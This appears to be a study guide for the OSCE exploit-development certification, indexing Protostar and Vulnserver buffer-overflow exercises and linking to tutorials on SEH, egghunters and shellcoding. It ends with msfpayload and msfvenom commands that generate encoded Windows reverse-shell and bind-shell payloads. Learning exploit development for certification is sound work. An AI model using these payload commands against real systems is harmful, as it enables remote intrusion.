- Backdooring PE - Weaponizing Your Favorite PE
- SEH + Egghunter(Manual Encoding) - HP OpenView NNM 7.5 Exploitation
Exploit Exercise (Protostar)
Module | Link | Note |
---|---|---|
Stack0 | Stack BOF Intro | N/A |
Stack1 | Stack BOF Basic1 | N/A |
Stack2 | Stack BOF Basic2 | N/A |
Stack3 | Stack BOF Basic3 | N/A |
Stack4 | Stack BOF Basic4 | N/A |
Stack5 | Stack BOF Shellcode | |
Stack6 | Stack BOF ret2libc | ROP is no need for OSCE |
Stack7 | Stack BOF ret2.text | ROP is no need for OSCE. But learn POP; POP; RET concept with this |
Vulnserver (Vulnserver)
Series | Link | Command | Vulnerability | Note |
---|---|---|---|---|
Part 1 | Read | N/A | N/A | Lab Setup |
Part 2 | Read | TRUN | EIP Overwrite | |
Part 3 | Read | GMON | SEH Overwrite + Short JMP + Egghunter | |
Part 4 | Read | KSTET | EIP Overwrite + Short JMP + Egghunter | |
Part 5 | Read | HTER | EIP Overwrite + Restricted Characters + Manual Offset Finding | |
Part 6 | Read | GTER | EIP Overwrite + Socket Reuse Exploit | |
Part 7 | Read | LTER | SEH Overwrite + Restricted Characters + Encoded Payloads |
- Study Plan - https://www.abatchy.com/2017/03/osce-study-plan
- Prep Guide - https://tulpa-security.com/2017/07/18/288/
- Mona.py - https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
- Techryptic - Great Tips
- Jack Halon - https://jhalon.github.io/OSCE-Review/
- Connor McGarr - https://connormcgarr.github.io/CTP-OSCE-Thoughts/
- Examples - https://github.com/dhn/OSCE
- OSCE_Bible - https://github.com/mohitkhemchandani/OSCE_BIBLE
- FullShade - https://github.com/FULLSHADE/OSCE (*POCs)
- h0mbre - https://github.com/h0mbre/CTP-OSCE (*Good helpers)
- ihack4falafel - https://github.com/ihack4falafel/OSCE
-
FuzzSecurity - http://fuzzysecurity.com/tutorials.html
-
SecuritySift - http://www.securitysift.com/
-
Fuzzing
-
Structured Exception Handler (SEH)
-
Egghunter
-
ASLR
-
Shellcoding
- Exploit Wrting Part 9 - Shellcoding
- https://www.fuzzysecurity.com/tutorials/expDev/6.html
- http://sh3llc0d3r.com/windows-reverse-shell-shellcode-i/
- http://www.vividmachines.com/shellcode/shellcode.html#ws
- Jumping to Shellcode - https://connormcgarr.github.io/CTP-OSCE-Thoughts/
- Alphanumeric Shellcod2 1 - https://blog.knapsy.com/blog/2017/05/01/quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/
- Alphanumeric Shellcode 2 - https://connormcgarr.github.io/Admin-Express-0day/
-
Opcode
- 32-bit Opcode Table - http://sparksandflames.com/files/x86InstructionChart.html
- Types of Jump - http://www.unixwiz.net/techtips/x86-jumps.html
- ASM Assembler/Dissambler - https://defuse.ca/online-x86-assembler.htm#disassembly
-
Web Application
-
Windows API
/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 C
/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 C
msfvenom -p windows/shell_reverse_tcp LHOST=1192.168.x.x LPORT=443 -a x86 --platform=win -e x86/alpha_mixed -f raw
msfpayload windows/shell_bind_tcp R > bind
msfencode -e x86/alpha_mixed -i bind -t perl
msfvenom -p windows/shell_bind_tcp -a x86 --platform=win -e x86/alpha_mixed -f perl